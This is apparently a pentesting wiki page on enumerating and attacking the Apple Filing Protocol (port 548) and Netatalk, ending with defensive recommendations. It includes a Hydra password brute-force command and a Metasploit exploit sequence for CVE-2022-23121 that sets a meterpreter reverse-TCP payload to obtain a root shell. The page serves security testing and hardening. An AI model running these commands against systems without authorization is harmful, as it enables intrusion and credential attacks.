548 - Pentesting Apple Filing Protocol (AFP)

Reading time: 5 minutes

Basic Information

The Apple Filing Protocol (AFP), once known as AppleTalk Filing Protocol, is a specialized network protocol included within Apple File Service (AFS). It is designed to provide file services for macOS and the classic Mac OS. AFP stands out for supporting Unicode file names, POSIX-style and ACL permissions, resource forks, named extended attributes and sophisticated file-locking mechanisms.

Although AFP has been superseded by SMB in modern macOS releases (SMB is the default since OS X 10.9), it is still encountered in:

• Legacy macOS / Mac OS 9 environments
• NAS appliances (QNAP, Synology, Western Digital, TrueNAS…) that embed the open-source Netatalk daemon
• Mixed-OS networks where Time-Machine-over-AFP is still enabled

Default TCP Port: 548 (AFP over TCP / DSI)

PORT     STATE SERVICE
548/tcp  open  afp

Enumeration

Quick banner / server info

# Metasploit auxiliary
use auxiliary/scanner/afp/afp_server_info
run RHOSTS=<IP>

# Nmap NSE
nmap -p 548 -sV --script "afp-* and not dos" <IP>

Useful AFP NSE scripts:

The NSE brute-force script can be combined with Hydra/Medusa if more control is required:

hydra -L users.txt -P passwords.txt afp://<IP>

Interacting with shares

macOS

# Finder → Go → "Connect to Server…"
# or from terminal
mkdir /Volumes/afp
mount_afp afp://USER:[email protected]/SHARE /Volumes/afp

Linux (using afpfs-ng ‑ packaged in most distros)

apt install afpfs-ng
mkdir /mnt/afp
mount_afp afp://USER:[email protected]/SHARE /mnt/afp
# or interactive client
afp_client <IP>

Once mounted, remember that classic Mac resource-forks are stored as hidden ._* AppleDouble files – these often hold interesting metadata that DFIR tools miss.

Common Vulnerabilities & Exploitation

Netatalk unauthenticated RCE chain (2022)

Several NAS vendors shipped Netatalk ≤3.1.12. A lack of bounds checking in parse_entries() allows an attacker to craft a malicious AppleDouble header and obtain remote root before authentication (CVSS 9.8 – CVE-2022-23121). A full write-up by NCC Group with PoC exploiting Western-Digital PR4100 is available.

Metasploit (>= 6.3) ships the module exploit/linux/netatalk/parse_entries which delivers the payload via DSI WRITE.

use exploit/linux/netatalk/parse_entries
set RHOSTS <IP>
set TARGET 0   # Automatic (Netatalk)
set PAYLOAD linux/x64/meterpreter_reverse_tcp
run

If the target runs an affected QNAP/Synology firmware, successful exploitation yields a shell as root.

Netatalk OpenSession heap overflow (2018)

Older Netatalk (3.0.0 - 3.1.11) is vulnerable to an out-of-bounds write in the DSI OpenSession handler allowing unauthenticated code execution (CVE-2018-1160). A detailed analysis and PoC were published by Tenable Research.

Other notable issues

• CVE-2022-22995 – Symlink redirection leading to arbitrary file write / RCE when AppleDouble v2 is enabled (3.1.0 - 3.1.17).
• CVE-2010-0533 – Directory traversal in Apple Mac OS X 10.6 AFP (detected by afp-path-vuln.nse).
• Multiple memory-safety bugs were fixed in Netatalk 4.x (2024) – recommend upgrading rather than patching individual CVEs.

Defensive Recommendations

1. Disable AFP unless strictly required – use SMB3 or NFS instead.
2. If AFP must stay, upgrade Netatalk to ≥ 3.1.18 or 4.x, or apply vendor firmware that back-ports the 2022/2023/2024 patches.
3. Enforce Strong UAMs (e.g. DHX2), disable clear-text and guest logins.
4. Restrict TCP 548 to trusted subnets and wrap AFP inside a VPN when exposed remotely.
5. Periodically scan with nmap -p 548 --script afp-* in CI/CD to catch rogue / downgraded appliances.

Brute-Force

References

• Netatalk Security Advisory CVE-2022-23121 – "Arbitrary code execution in parse_entries" https://netatalk.io/security/CVE-2022-23121
• Tenable Research – "Exploiting an 18-Year-Old Bug (CVE-2018-1160)" https://medium.com/tenable-techblog/exploiting-an-18-year-old-bug-b47afe54172